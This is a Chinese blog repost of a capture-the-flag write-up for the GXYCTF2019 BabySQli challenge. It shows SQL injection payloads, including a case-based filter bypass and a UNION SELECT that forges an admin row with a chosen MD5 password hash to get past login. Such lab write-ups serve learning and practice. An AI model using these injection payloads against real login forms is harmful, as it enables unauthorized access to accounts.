我是靠谱客的博主 鲤鱼便当,最近开发中收集的这篇文章主要介绍[GXYCTF2019]BabySQli,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

在这里插入图片描述
随意构造,点击登录后查看源码,发现隐藏提示
在这里插入图片描述
是一个base32,解码后再解一次base64即可

select * from user where username = '$name'
构造
admin' 报错
admin'# 回显正常

fuzz了一下,过滤了or,大写绕过ORder by 3查询列数,可知有3列
常规注入

admin' union select 1,2,3#

回显wrong pass
有一个新技巧,mysql在查询不存在的数据时,会自动构建虚拟数据

在这里插入图片描述
在这里插入图片描述
原本库里没有1313131313,但mysql自动给我们加上了,相当于我们临时创建了一个admin用户,密码是1313131313
这里还有一点,说后台password经过了md5加密,这个点我不知道从何得知

假设密码为123,其md5值为202cb962ac59075b964b07152d234b70
构造1' union select 1,'admin','202cb962ac59075b964b07152d234b70'#,然后password的值为123,post一下即可得到flag
在这里插入图片描述

最后

以上就是鲤鱼便当为你收集整理的[GXYCTF2019]BabySQli的全部内容,希望文章能够帮你解决[GXYCTF2019]BabySQli所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(46)

评论列表共有 0 条评论

立即
投稿
返回
顶部